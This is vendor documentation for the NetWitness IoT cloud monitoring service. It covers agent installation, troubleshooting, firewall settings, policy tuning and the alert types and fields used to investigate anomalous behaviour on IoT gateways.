This the multi-page printable view of this section. Click here to print.

Return to the regular view of this page.

NetWitness Internet of Things

Secure your IoT Infrastucture

1 - Getting Started

Learn how to use NetWitness IoT, the first point of interaction with NetWitness IoT services.

1.1 - Welcome to NetWitness IoT

Welcome to NetWitness IoT

Welcome to NetWitness IoT

Every enterprise is adding new IoT devices as part of improving its infrastructure and operation efficiency. The IoT devices include sensors, robots, smart locks, connected cameras, mobile card readers, inventory devices, stock control devices, and other smart devices. The wide range of complex functions performed by IoT devices makes it hard for security teams to spot anomalous behavior. This poses a considerable challenge in securing these new IoT devices and protecting the infrastructure and data. NetWitness IoT provides complete visibility into your connected IoT environment.

NetWitness IoT enables organizations to extend their Security Operation Center (SOC) visibility beyond IT and into IoT and OT (Operational Technology).

NetWitness IoT provides the ability to monitor and detect threats end-to-end. For example, an attack initiated from the IT systems and laterally moved to the OT systems can be easily detected. The analysts can get visibility into the complete spectrum of attacks on the entire environment.

NetWitness IoT uses the following technologies to identify security threats and detects compromised IoT devices quickly:

  • Use of latest technology to quickly identify when IoT devices are compromised.
  • Latest behavior analytics.
  • Advanced threat intelligence.

NetWitness IoT transforms organizations by providing the following capabilities:

Features Benefits
Visibility across the edge and IoT devices using machine learning and behavioral alerting NetWitness IoT provides enhanced visibility on your IoT devices and alerts you in case of any threats or anomalous activities. The wide range of complex functions performed by IoT devices makes it hard for security teams to spot anomalous behavior. NetWitness IoT applies advanced machine learning and behavior analytics, along with advanced threat intelligence, to quickly identify instances where devices could be compromised.
Robust investigation capabilities Rich visualization and reporting capabilities security analysts to efficiently investigate anomalous activities. Full meta and drill-down capabilities help you focus on risks, not noise.
Quickly respond to threats and reduce risk NetWitness IoT provides enterprises with capabilities to monitor gateways, servers, and connected devices for all types of behavioral anomalies and produce focused and actionable alerts.
Integration with multiple IoT platforms NetWitness IoT integrates with leading IoT management platforms and SIEMs using standard mechanisms (JSON, CEF). This type of deployment enables you to prioritize investigations and accelerate incident detection and response. In addition to NetWitness Platform you can also integrate with other security tools using standard protocols.

1.2 - About NetWitness IoT licenses

About NetWitness IoT licenses

About NetWitness IoT licenses

NetWitness IoT licenses are valid for the time period associated with the license purchase. NetWitness IoT provides a customer-focused licensing strategy.

The following pricing is annual and can be billed monthly:

Product Price Unit Storage Duration
NetWitness IoT (SaaS only) Entitles full application with cloud UI for 12 months .5 TB storage Annual
NetWitness IoT (SaaS only) Per add-on capacity unit 1 TB storage Annual

When an extra capacity unit is added, it is prorated on a monthly basis according to the contract cycle for the primary unit. Contact support to learn more about subscription details and licenses.

1.3 - NetWitness IoT Architecture

NetWitness IoT architecture

NetWitness IoT Architecture

NetWitness IoT enables analysts to get complete visibility into the whole spectrum of attacks on the entire environment. The following diagram shows the solution architecture of NetWitness IoT:

NetWitness IoT Sign In

In this diagram, the edge components such as the gateways, hosts, and sensors are listed. The RSA cloud service receives the data from the edge components, performs the analytics, and infers insights. The alerts and details are presented to the analysts to take action.

The collector component of the IoT Security Monitor is deployed at the Edge. Typically, it is deployed on an edge gateway or a host that runs an IoT platform for data acquisition and management based on the use cases. The collector collects and sends the security-relevant data from the Edge to the RSA Cloud Service, which performs analytics, detects anomalies, and generates alerts.

Based on this scenario, there are the following two use cases:

  • Use Case 1: The first use case is focused on the plant operator who can directly log into a dashboard and see the alerts, drill down to explore the relevant context, and then take action.
  • Use Case 2: The second use case is focused on the Security Operation Center (SOC). In this case, the alerts generated by IoT Security Monitor are sent to the enterprise monitoring tools, such as NetWitness Platform, which enables the SOC to extend its visibility beyond IT and into the OT side of the environment. The integration with SOC is done using Common Event Format (CEF). CEF is a log management standard that provides an interoperable way to exchange security-related information. Therefore, NetWitness IoT can be integrated with any CEF-compliant IT monitoring tool. NetWitness IoT integrates with leading IoT management platforms and SIEMs using standard mechanisms including JSON and CEF. This capability helps you easily add advanced security to existing deployments.

Typically, a Small-to-Medium Business (SMB) enterprise may be interested only in the first use case, whereas a large enterprise will most likely benefit from both use cases.

1.4 - Log in to your NetWitness IoT

Log in to your NetWitness IoT

Log in to your NetWitness IoT

NetWitness IoT is a cloud solution, and you need to log into your NetWitness IoT to view the alerts and perform the tasks.

To log in to your NetWitness IoT account

  1. Open your browser and type the following URL:

    https://iot.netwitness.com

  2. Click LOGIN and type your email address and password, and then click Sign in.

    The Dashboard page is displayed.

    NetWitness IoT Sign In

1.5 - View Subscription Details

View subscription details

View Subscription Details

You can view the following details of the NetWitness IoT subscription:

  • License information such as active licenses and license expiry.
  • Used and available storage space based on your subscription.
  • Storage History information such as usage statistics for a period.

To view your subscription details

  1. Log in to NetWitness IoT.
  2. On the top right, click Subscription.

    NetWitness IoT Subscription

2 - Install and setup

Provides information for installing and configuring the agents and troubleshoot any issues.

2.1 - Pre-installation Requirements

Pre-installation requirements

Pre-installation Requirements

The NetWitness IoT agent monitors multiple aspects of the host system. Hence, it requires privileged access to various parts of the host system. For the NetWitness IoT agent to operate optimally, the Linux kernel must be configured. Before you install the NetWitness IoT agent, verify that the system meets the following requirements. Configure the Linux kernel with:

  • Conntrack kernel modules
  • Forkstat kernel modules
Requirements Specifications
Supported Platforms NetWitness IoT Agent is available as a standalone binary and docker container. Currently, NetWitness IoT Agent is supported in the following Linux platforms:
• amd64
• arm32
• arm64

NOTE: A beta version of the NetWitness IoT Windows agent is currently available. Contact NetWitness Support and get the application details.

Configure Conntrack Kernel Modules

Conntrack is the name for the Linux kernel subsystem that performs connection tracking. You need to configure Conntrack in one of the following ways:

  • Compile into the Linux kernel
  • Load as kernel modules

The NetWitness IoT agent connects to this kernel service and receives notifications based on network connection changes.

To use this service, you must make sure the following:

  • Correct kernel configuration if required.
  • NetWitness IoT agent needs to run with sufficient privileges to access this service.

In case the agent is running outside a container, it needs to run as a root. If the Conntrack is running in a docker container, the container needs to have NET_ADMIN capability and view the hosts’ network.

Turn on the following kernel options:

  • nf_conntrack_acct
  • nf_conntrack_timestamp The two kernel options need to be turned on to enhance the Conntrack output if the correct module is installed.

NOTE: If you set up the modules correctly, the kernel options will be automatically enabled when the NetWitness IoT agent starts.

Configure Forkstat Kernel Modules

You need to compile the Forkstat kernel in the correct order for the Forkstart to function. Forkstat kernel needs to be built with the CONFIG_PROC_EVENTS, and CONFIG_CONNECTOR options enabled. It appears that if CONFIG_CONNECTOR is compiled as a loadable module, CONFIG_PROC_EVENTS will not be enabled.

Make sure that the kernel configuration should be like the following:

# if CONFIG_CONNECTOR=m

# PROC_EVENTS will not be built

_CONFIG_CONNECTOR=y

CONFIG_PROC_EVENTS=y

You can view the above details in the logs when the NetWitness IoT agent starts if Conntrack and Forkstat are correctly installed and configured. The flags in italic need to be enabled and have the values shown in Conntrack, Forkstat enabled section for agent to work fine. The NetWitness IoT agent prints log messages during startup if any modules are not configured or available in the kernel.

Go to the Troubleshoot installation issues section to see how Conntrack and Forkstat are correctly enabled and configured.

2.2 - Install NetWitness Agent

Install NetWitness agent

Install NetWitness Agent

You need to install the NetWitness IoT agent on every host or gateway that you use to manage IoT devices. In NetWitness IoT, a host is also known as the gateway where the NetWitness IoT agent is installed and configured. If you have multiple hosts, you need to install and configure the NetWitness IoT agent on every host. The NetWitness IoT agent image is available in the following formats:

  • Docker
  • Binary

NOTE: A beta version of the NetWitness IoT Windows agent is currently available. Contact NetWitness Customer Support and get the application details.

You need to install the NetWitness IoT agent on a Linux platform. To install and set up NetWitness IoT, you need to download the access key and agent on the same directory on a host.

NOTE: The installation procedures provided here are focused on manual installation. If you belong to a large organization with multiple gateways, you can integrate the installation process with existing software deployment tools in your organization.

To download and install NetWitness IoT agent using Docker

  1. Log in to NetWitness IoT.

  2. Click Agent.

    NetWitness IoT agent installation

  3. Download RISM-AccessKey-XXXX.csv into the directory where you want to set up the NetWitness IoT agent. For example, you can create the following directory on the host to store the agent and docker files:

    ~/RsaRISM/

  4. To download and install the docker image, click DOCKER, and click the tar file that suits your host:

    • rism-agent-arm32-docker-1.0.tgz
    • rism-agent-arm64-docker-1.0.tgz
    • rism-agent-x86_64-docker-1.0.tgz

NOTE: Make sure that you downloaded the agent tar file and the access key on the ~/RsaRISM/ directory on the host.

  1. Extract the docker version, use the following command:

    tar xvzf rism-agent-*.tgz

  2. To install the Docker version, run the following command:

    ./run-rism-agent.sh

  3. Follow the on-screen instructions to complete the installation.

To download and install NetWitness IoT agent using Binary

  1. Log in to NetWitness IoT.
  2. Click Agent.

    NetWitness IoT agent installation

  3. Download RISM-AccessKey-XXXX.csv into the directory where you want to set up the NetWitness IoT agent. For example, you can create the following directory on the host to store the agent and docker files:

~/RsaRISM/ 4. Click Agent and click BINARY, and click the tar file that suits your host: * rism-agent-arm-binary-1.0.tar * rism-agent-arm64-binary-1.0.tar * rism-agent-x86_64-binary-1.0.tar

NOTE: Make sure that you downloaded the agent tar file and the access key on the ~/RsaRISM/ directory on the host.

  1. Extract the file you downloaded using the following command:

    tar xvzf rism-agent-*.tar

  2. To install the Binary version, run the following command:

    ./run-rism-agent.sh -b

  3. Follow the on-screen instructions to complete the installation.

To verify successful installation

  • Ensure there are no error messages in logs during NetWitness IoT agent startup.
  • If the installation is successful, the agent will be listed as Gateway when you log into NetWitness IoT.

2.3 - Troubleshoot Installation Issues

Troubleshoot installation issues

Troubleshoot Installation Issues

If you run into issues with your NetWitness IoT installation, refer to the following information to complete your installation and successfully set up NetWitness IoT.

Here are the issues and resolutions:

Issue 1: conntrack, forkstat not enabled

View log messages to check during agent startup

open /proc/sys/net/netfilter/nf_conntrack_timestamp: no such file or directory

procConnector =

procEvents =

netFilterNetlink =

nfConntrack = m

nfConntrackIPv4 =

nfConntrackIPv6 =

nfConntrackEvents = y

Written pid(1410523) to /var/run/rsa-rism-agent.pid

Hostname = gateway-test-machine

MachineID = 01f84b37c7eb9b8150988036a9890a476749e567ec78b7b575b9ded350a3dddc

Kernel version = 5.4.24-2.1.0+gbabac008e5cf #1 SMP PREEMPT Thu Dec 17 07:02:31 UTC 2020

Inside container = true

IP address = X.X.X.X

IP addresses = [X.X.X.X]

Local networks = [{X.X.X.X}]

nf_conntrack_acct =

nf_conntrack_timestamp =

ErrorLog: Unable to start forkstat() process monitoring: unable to create procnotify socket: Protocol not supported

ErrorLog: Unable to start conntrack() network monitoring: NETLINK error: unable to start conntrack: socket: protocol not supported

Resolution

Enable conntrack, forkstat modules and ensure nf_conntrack module and nf_conntrack_timestamp flags are set to true.

How to check if conntrack_timestamp is enabled/available in the module?

modinfo nf_conntrack

ls /proc/sys/net/netfilter/

Issue 2: Firewall blocks out-going traffic

If the network blocks outgoing traffic to AWS then the following error appears on the agent and Gateway will not be listed in NWIoT Cloud console.

Log messages to check in agent

AWS: Start authenticating

AWS: authenticate with Password

Upload data every 60 seconds

Upload all data every 60 seconds

Retrieve time from server

Get time from http://aws.amazon.com__;!!LpKI!zlJ4i- t0FyVdUvSvR4n9KZ1eukXUSFt4cdeCplh5x4BSy2aHtotGJy7-dTG8VOBE$ [aws[.]amazon[.]com]

Unable to get server time offset: Get "http://aws.amazon.com__;!!LpKI!zlJ4i- t0FyVdUvSvR4n9KZ1eukXUSFt4cdeCplh5x4BSy2aHtotGJy7-dTG8VOBE$ [aws[.]amazon[.]com]": dial tcp: lookup aws.amazon.com on [::1]:53: server misbehaving

Processes(kt,th,pr): new = (0,0,19), live = (0,0,0), dead = (0,0,18)

AWSS3: authentication error: RequestError: send request failed caused by: Post "https://cognito-idp.us-east-1.amazonaws.com/__!!LpKI!zlJ4i- t0FyVdUvSvR4n9KZ1eukXUSFt4cdeCplh5x4BSy2aHtotGJy7-dSHE7HSq$ [cognito-idp[.]us-east- 1[.]amazonaws[.]com]": dial``tcp: lookup cognito-idp.us-east-1.amazonaws.com on [::1]:53: server misbehaving

Resolution

Open up the following URLs or IPS in your firewall and make the following changes:

For Authentication to access our cloud analytics service:

URL     : 
           cognito-idp.us-east-1.amazonaws.com 	
Protocol: 
            HTTPS

For Time Sync:

 URL: 
         aws.amazon.com 
 Protocol: 
             http

For S3 (To upload metadata to cloud analytics service):

 Following are the list of IP ranges:

         54.231.0.0/16
         52.216.0.0/15
         3.5.0.0/19
         44.192.134.240/28
         44.192.140.64/28

 Protocol: 
             HTTPS

For cloudFront (Cloud Service access):

 Following are the list of IP ranges:

         3.231.2.0/25
         3.234.232.224/27
         3.236.169.192/26
         3.236.48.0/23
         34.195.252.0/24
        34.226.14.0/24

 Protocol: 
             HTTPS

NOTE:

Commands used to fetch S3 and CloudFront details:

jq -r '[.prefixes[] | select(.region=="us-east-1" and .service=="S3").ip_prefix] | .[]' < ip-ranges.json

jq -r '[.prefixes[] | select(.region=="us-east-1" and .service=="CLOUDFRONT").ip_prefix] | .[]' < ip-ranges.json

NOTE: ip-ranges.json is available at https://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html

Issue 3: NTP/Time-sync issue with the Host

Log messages to check in the IoT agent

Get time from http://aws.amazon.com

Server time offset is 19787.481 seconds

upload.process: Unable to upload from Memory - RequestTimeTooSkewed: The difference between the request time and the current time is too large.

status code: 403, request id: V335V01AYQ3KNTYV, host id: zClioa8xksTUWSM6FQFu/SO0pQ7r6x69m098PAN8P0NxkQox2nER3xwdSaeGxe11tJr3NVa1V0k=

Resolution

Time on agent is out of sync. Sync time with any ntp server and re-run the agent.

Issue 4: How to capture docker agent logs and share with the support team for debugging?

Resolution

Redirect the Agent logs to nwiot-agent.log file

docker logs -f rism-agent >& nwiot-agent.log

Issue 5: Agent is listed as Gateway in cloud but no alerts are generated?

Resolution

If you run into this issue, contact NetWitness Customer Support.

2.4 - Integrate with NetWitness or other SIEM platforms

Integrate with NetWitness or other SIEM platforms

Integrate with NetWitness Platform or other SIEM Solutions

You can integrate the NetWitness IoT solution with NetWitness Platform or other SIEM solutions to automatically forward the alerts. Analysts can view the alerts related to IoT and review them. Analysts can identify if similar alerts are detected on other entities and understand how it impacts the environment.

NOTE: You can create and manage different destination endpoint groups. The first added Endpoint acts as the primary alert destination, and additional endpoints within a group serve as backups.

To integrate NetWitness IoT with NetWitness Platform

  1. Log in to NetWitness IoT.
  2. Click the Alert Shipper tab and click + New Endpoint.

    NetWitness IoT alert shipper

  3. Click + New Endpoint. The New Endpoint window appears.

    NetWitness IoT alert shipper

  4. Follow the on-screen instructions to add the Endpoint.
  5. After you add an endpoint, enable Alert Shipping.

2.5 - Manage Policies

Manage policies

Manage Policies

Policies are a set of monitoring rules targeted at all the IoT devices connected to a gateway on a network.

Using policies, you can:

  • Monitor all Network traffic of IoT devices.
  • Monitor all the processes associated with IoT devices.
  • Detect known rule violations and unseen anomalies in IoT devices.

NOTE: You can only modify an existing policy. You cannot create or delete a policy.

By default, NetWitness IoT provides a set of monitoring policies or rules automatically applied to all the IoT devices connected to the hosts. You can update a policy and define the rules for the policy. For more on the parameters and values, see Parameters and field descriptions of NetWitness IoT alerts.

NOTE: You can modify global policies that are used for generating alerts. You can change policies to set thresholds and generate more alerts. You can ignore some types of events or set threshold limits to control the number of alerts that are generated. For more information, see Update policies based on alerts.

To manage policies

  1. Log in to NetWitness IoT.

  2. Click Policy to open the Policy Configuration page.

    NetWitness IoT Policy Configuration

  3. In the Editor section, modify the required policy parameters.

  4. Click Save.

3 - Investigate

Provides information on using NetWitness IoT to identify and investigate the alerts, hosts, and take action on them.

3.1 - NetWitness IoT for Security Investigation

NetWitness IoT for security investigation

NetWitness IoT for Security Investigation

NetWitness IoT protects your IoT devices by detecting the following types of threats and anomalous behaviors:

Types of Threats How detection works
Blacklisted Process Detects all types of blacklisted processes and alerts when a host launches a process and the executable name exactly matches any entry in the processBlacklist array.
Known Risky Outbound Connection Detects any known risky outbound connection and alerts you based on the threat score for the destination IP of an outbound connection and alerts if any connections are detected beyond the defined threshold.
Anomalous New Connection Volume Detects anomalous new connection volume and alerts you based on the number of connections from the observed baseline during the last hour.
PCR Detects and alerts you based on the volume of traffic leaving a host compared to the volume of traffic coming into a host and alerts when this ratio changes significantly from observed behavior over the previous day.
Anomalous Inbound Connection External Detects all anomalous inbound external connections and alerts you based on the changes in the source of inbound connections from the external network compared to previously observed connections.
Anomalous Process Detects all types of anomalous processes and alerts you based on the running processes that have not been observed for this host in the past.
Anomalous Inbound Connection Detects all anomalous inbound connections and alerts you based on the changes in the source of inbound connections from the local network compared to previously observed connections.

3.2 - View Available Gateways

View available gateways

View Available Gateways

In NetWitness IoT, a host is also known as the gateway where the NetWitness IoT agent is installed and configured. You can view all the gateways or hosts and learn more about the alerts generated on each gateway. You can view details about each alert, including the date and time stamp of the alert, the severity, meta, and rule associated with the alert.

You can select a gateway, view the status and learn more about the alerts that are generated. You can click an alert, view all the details about the alert, and then take necessary action.

To view available gateways

  1. Log in to NetWitness IoT.

  2. Click the Hosts tab and view available Gateways.

    View available gateways in NetWitness IoT

    The following table lists the parameters on the Hosts page:

Parameters Description
Alerts Number of Alerts detected on the gateway.
Inactive Containers Displays the number of inactive containers.
Active Containers Displays the number of active containers.
Host OS Provides information about the operating system of the gateway on which the agent is installed.
Modules Loaded If all the required modules for the agent are installed on the gateway, the value is displayed as true; otherwise, it is false.
IP The IP address of the Gateway on which the agent is installed.
Conntrack Acct Enabled If the Conntrack module installed is correct and the kernel options (nf_conntrack_acct, nf_conntrack_timestamp) are set, the value is displayed as true. If the module installed is incorrect and the flags are not set, the value is displayed as false.
Real-Time Process Monitoring If the Gateway on which the agent is installed is not a CoreOS, the value is set to true; else, it is displayed as false.
Last Updated The timestamp at which cloud service last collected data from the agent.
R. Created Displays the UTC timestamp when this alert was recorded.
Rule Policy Rules that are violated such as Anomalous New Connection Volume, Anomalous Inbound Connection External.
Severity The severity of the Alert. An alert can have Low, Medium, High severity statuses.
Meta Provides brief information about the alert. If you click any alert, a new window is displayed with the information such as Endpoint Category, Container, Container Process Profiles, Endpoint Category (Geo).
Actions Displays what action you performed for each alert:
Viewed
False Positive

3.3 - View Alerts on NetWitness IoT Dashboard

View alerts on NetWitness IoT dashboard

View Alerts on NetWitness IoT Dashboard

NetWitness IoT provides an intuitive dashboard that helps easy investigations. The rich visualization and reporting capabilities enable efficient investigations of all types of anomalous activities. NetWitness IoT provides full meta and drill-down capabilities to enable analysts to focus on risks.

Using the NetWitness IoT Dashboard, you can:

  • View alerts by severity
  • View alerts for the last 30 days
  • View alerts based on rules
  • View alerts by country
  • View alerts by region

To view alerts on NetWitness IoT Dashboard

  1. Log in to NetWitness IoT.
  2. On the top left, click Dashboard.

    NetWitness IoT dashboard

  3. View widgets on the Dashboard tab to learn more about alerts that are detected based on different categories.
  4. Hover over each element and view the number of alerts detected.

NOTE: NetWitness IoT enables you to view the number of alerts that were detected in a specific period. You can also customize and select a time period and view all the alerts that were detected in that slot.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts

3.4 - View all alerts

View all alerts

View all alerts

NetWitness IoT enables you to view all the alerts. You can filter the alerts and find the specific alert.

To view all alerts

  1. Log in to NetWitness IoT.

  2. Click Alerts.

    The Alerts page is displayed.

NetWitness IoT all alerts

You can choose rows per page and view all alerts.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts

3.5 - Investigate an Alert

Investigate an alert

Investigate an Alert

You can view an alert and conduct a detailed investigation on any alert that NetWitness IoT detects.

To investigate an alert

  1. Log in to NetWitness IoT.

  2. Click Alerts.

  3. On the Alerts page, click any alert that you want to investigate.

    The Alert Rule page appears with alert details.

  4. Review the alert details.

  5. To copy the alert data, move the Raw Data toggle switch and copy the raw data.

  6. Use the raw data to conduct further investigation on the alert.

    For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts

3.6 - Use Filters to narrow down Alerts for Investigation

Use filters to narrow down alerts for investigation

Use filters to narrow down alerts for investigation

You can use filters to narrow down the alerts and further investigate an alert. You can use different filters to find an alert or a set of alerts and then take action.

NOTE: Filter list is dynamic based on alerts in the system. By default, if you do not select a specific category in the filter, you can only view alerts that the system currently generates. If no alert is detected from a specific category, NetWitness IoT does not display that category in the Alert Filters window. For example, if 0 alerts are detected from ANOMALOUS_PROCESS category, then ANOMALOUS_PROCESS category will not be displayed in the Alert Filters window.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To filter alerts

  1. Log in to NetWitness IoT.
  2. Click Alerts.
  3. On the Alerts page, click the Filter icon.
  4. In the Alerts Filters page, select a Policy Rule from the following list:
    • ANOMALOUS_PROCESS
    • ANOMALOUS_OUTBOUND_CONNECTION
    • BLACKLISTED_PROCESS
    • KNOWN_RISKY_INBOUND_CONNECTION
    • PCR
    • UNGRACEFUL_CONTAINER_SHUTDOWN
    • ANOMALOUS_OUTBOUND_CONNECTION_SITELOCAL
    • ANOMALOUS_INBOUND_CONNECTION_CONTAINER
    • ANOMALOUS_INBOUND_CONNECTION_SITELOCAL
    • ANOMALOUS_INBOUND_CONNECTION_EXTERNAL
    • ANOMALOUS_OUTBOUND_CONNECTION_BY_CLASSIFICATION
    • ANOMALOUS_NEW_CONNECTION_VOLUME
  5. Choose a date and time.
  6. Select a severity from the list:
    • High
    • Medium
    • Low
  7. Choose a country from the list.
    • Select False Positive.
    • Select Viewed Alerts.
  8. Click Close.

3.7 - Investigate Hosts

Investigate Hosts

Investigate Hosts

The NetWitness agent is deployed on every gateway or host and collects data from all the devices that are connected to these hosts. You can go to the Gateways and view all the alerts that were detected. You can review the details of an alert and conduct a detailed investigation. You can assign the status as viewed for each alert. If you find an alert invalid, you can mark it as a false positive.

NOTE: To investigate, you can also get more details about an alert from the Alerts page or a Hosts page.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To investigate hosts

  1. Log in to NetWitness IoT.

  2. Click Hosts.

    Available Gateways are listed on the left panel.

  3. Click a Gateway to see the alerts.

    You can choose different gateways and see the list of alerts detected on that gateway or host.

  4. On the left panel, review the list of alerts that were detected on that gateway.

  5. Click an alert.

    The Alert Rule window lists the details of the alert.

  6. Review the alert details.

  7. Toggle the Raw Alert and copy the strings.

    You can continue to analyze and take action on these alerts.

3.8 - Take Action on Alerts

Take Action on Alerts

Take Action on Alerts

You can view all the alerts detected on each gateway or host and take action on each alert. When you finish the investigation on an alert, you can mark it as Viewed. When you search for alerts, the viewed category helps filter alerts that are already marked as viewed. This helps save your time and effort in finding the proper alert and respond.

When you investigate an alert, if you notice that an alert is not valid, you can mark the alert as False Positive. When you mark an alert as false positive, you can use the filters to hide the invalid alerts and focus on the valid alerts.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To identify an alert as False Positive

  1. Log in to NetWitness IoT.

  2. Click Alerts.

    You can also click the Hosts tab and find alerts that are detected on different gateways.

  3. Click an alert.
    The Alert Rule window lists the details of the alert.

  4. Review the alert details.

  5. If you notice that an alert is legitimate, on the top right, click False Positive.

    When you mark an alert as false positive, you can use the filters to hide the alert and focus on the valid alerts.

To mark the alert as Viewed

  1. Log in to NetWitness IoT.

  2. Click Alerts.

    You can also click the Hosts tab and find alerts that are detected on different gateways.

  3. Review the alert details

  4. To mark the alert as viewed, on the top right, click Viewed.

    When you mark an alert as Viewed, you can use the filters to hide the alerts you reviewed and focus on the new alerts.

3.9 - Update Policies based on Alerts

Update policies based on alerts

Update Policies based on Alerts

You can modify global policies that are used for generating alerts. You can change policies to set thresholds and generate more alerts. You can ignore some types of events or set threshold limits to control the number of alerts that are generated.

NOTE: Updating the policies can create an impact on the way alerts are generated. Therefore, you need to be cautious while updating policies. For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To change policies for alerts

  1. Log in to NetWitness IoT.

  2. Click Policy.

  3. On the right panel, under Editor, modify a policy.

    The Definitions panel lists the policy parameters that you can use for tuning the policies.

  4. Do one of the following:

    • To save your changes, click SAVE.
    • To discard your changes, click DISCARD.

3.10 - Parameters and Field Descriptions of NetWitness IoT Alerts

Parameters and field descriptions of NetWitness IoT alerts

Parameters and Field Descriptions of NetWitness IoT Alerts

This topic provides details on the parameter and field descriptions of NetWitness IoT alerts.

Here are the parameters and field descriptions:

Core field descriptions

Core Field Descriptions
id Unique id for the alert.
rule Name of rule that was violated and is the reason for this alert. Currently one of ANOMALOUS_OUTBOUND_CONNECTION, KNOWN_RISKY_OUTBOUND_CONNECTION, ANOMALOUS_INBOUND_CONNECTION_CONTAINER, ANOMALOUS_INBOUND_CONNECTION_SITELOCAL, ANOMALOUS_INBOUND_CONNECTION_EXTERNAL, ANOMALOUS_NEW_CONNECTION_VOLUME, PCR, BLACKLISTED_PROCESS, ANOMALOUS_PROCESS, UNGRACEFUL_CONTAINER_SHUTDOWN.
severityScore Numeric score corresponding to the severity field, from 0 (EMERGENCY) to 7 (DEBUG).
recordCreated UTC timestamp on which this alert record was created.
created UTC timestamp that the actual alert violation occurred on the offending container.
viewed Boolean value, which indicates whether this alert has been viewed by the end user in Netwitness IoT. Note: Viewed flag is configured by an analyst and is not calculated by NetWitness IoT.
falsePositive Boolean value, which indicates whether this alert has been marked as a false positive. Note: falsePositive flag is configured by an analyst and is not calculated by NetWitness IoT.

Extended field descriptions

Extended field Descriptions
meta.container Contains attributes about the container for which the alert was generated.
meta.endpointCategory Contains attributes about the network source or destination related to this alert. This field is available only for the network-related alert rules (ANOMALOUS_OUTBOUND_CONNECTION, KNOWN_RISKY_OUTBOUND_CONNECTION, ANOMALOUS_INBOUND_CONNECTION_CONTAINER, ANOMALOUS_INBOUND_CONNECTION_SITELOCAL, ANOMALOUS_INBOUND_CONNECTION_EXTERNAL, ANOMALOUS_NEW_CONNECTION_VOLUME, PCR, UNGRACEFUL_CONTAINER_SHUTDOWN).
meta.processProfile Contains attributes about the processes related to this alert. This field is available only for process-related alert rules (BLACKLISTED_PROCESS, ANOMALOUS_PROCESS).
meta.events Contains a list of Docker events related to this alert. This field is available only for an alert of rule type UNGRACEFUL_CONTAINER_SHUTDOWN.
meta.actual For alerts based on numerical scores, this field contains a value that triggered the alert. Set for alerts with rule types:
KNOWN_RISKY_OUTBOUND_CONNECTION
ANOMALOUS_NEW_CONNECTION_VOLUME
PCR
meta.expected For alerts based on numerical scores, this field contains an expected (normal) value. Set for alerts with rule types:
KNOWN_RISKY_OUTBOUND_CONNECTION
ANOMALOUS_NEW_CONNECTION_VOLUME
PCR
meta.threshold For alerts based on numerical scores, this field contains a threshold value that was crossed by the meta.actual value to generate this alert. Set for alerts with rule types:
KNOWN_RISKY_OUTBOUND_CONNECTION
ANOMALOUS_NEW_CONNECTION_VOLUME
PCR

meta.container fields descriptions

meta.container Descriptions
meta.container.id Docker container id.
meta.container.hostname Name of the physical or virtual host on which the offending container is running.
meta.container.hostIp IP address of the physical or virtual host on which the offending container is running
meta.container.hostId Id of the physical or virtual host on which the offending container is running. Id is unique to NetWitness IoT cloud service. Always present.
meta.container.recordCreated UTC timestamp that the container first became known to NetWitness IoT cloud service. Always present.
meta.container.recordUpdated UTC timestamp of when this container was last updated by NetWitness IoT cloud service. Always present.
meta.container.name Docker container name.
meta.container.imageName Full Docker image name.
meta.container.created UTC timestamp when the container was actually created on its Docker host.
meta.container.updated UTC timestamp of the last data generated by this container that was consumed by NetWitness IoT cloud service. This comes from the container, as opposed to the meta.container.recordUpdated field, which is generated by NetWitness IoT cloud service.
meta.container.running Boolean value. Whether the container was last reported to be running or not at the time the alert was generated.
meta.container.command Primary command that the container was launched under.
meta.container.status Last reported Docker status of the container at the time the alert was generated.
meta.container.ports A list of network ports exposed by this container. This field is available if the container exposes any ports. Each network port entry contains the following attributes:
• meta.container.port.privatePort: Private port, only accessible to the container and other containers running on the same private network as the container.
• meta.container.port.publicPort: Public port that maps to the private port. This is the port exposed to other services running on the Docker host or on the network.
• meta.container.port.type: Protocol accepted on this port (UDP or TCP) meta.container.events: If available, a list of recent Docker events reported against this container. Each Docker event contains the following fields:
• meta.container.event.containerId: Same as the meta.container.id value.
• meta.container.event.recordCreated: UTC timestamp when this event record was created by Netwitness IoT service.
• meta.container.event.created: UTC timestamp of the container event on the Docker host where the event took place
• meta.container.event.action: The container event type that took place. One of: attach, create, destroy, detach, die, exec_create, exec_detach, exec_start, kill, oom, pause, rename, restart, start, stop, unpause, update.
• meta.container.processProfiles: List of all process types that normally run in this container. Generally present. Each process profile entry contains the following fields:
firstSeen: UTC timestamp when this process profile was first observed to be running in this container. Always present.
• lastSeen: UTC timestamp when this process profile was last observed to be running in this container. Always present.
• id: Unique identifier
• pid: Process Id that this process was last running under in this container. Always present.
• ppid: Last reported parent process id of this process in this container. Always present.
• executable: The process executable. Always present.
• cmd: Full process command (executable plus arguments). Always present.
• eUser: Last reported effective user name (or id) for this process. May not be present.
• rUser: Last reported real user name (or id) for this process. May not be present.
• sUser: Last reported saver user name (or id) for this process. May not be present.
• eGroup: Last reported effective group name (or id) for this process. May not be present.
• rGroup: Last reported real group name (or id) for this process. May not be present.
• sGroup: Last reported saved group name (or id) for this process. May not be present.
• tt: The terminal associated with this process, if applicable. May not be present.
• pcpu: Last reported % CPU for this process. May not be present.
• pmem: Last reported % memory for this process. May not be present.

meta.endpoint category field descriptions

meta.endpoint category Descriptions
id Category id. This represents an abstract grouping of similar traffic, based on attributes such as protocol, geo-location, port, destination IP, etc.
isOutbound Boolean value. Set to true if this endpoint category is for a destination (i.e. the container in meta.container initiated the connection). False if this endpoint category is for a source (i.e. the endpoint initiated the connection into the container in meta.container).
firstSeen UTC timestamp when an endpoint in this category was first observed communicating with the meta.container.
lastSeen UTC timestamp when an endpoint in this category was last observed communicating with the container in meta.container.
protocol Protocol last used by any endpoint falling in this endpoint category. Generally One of udp, tcp, or icmp.
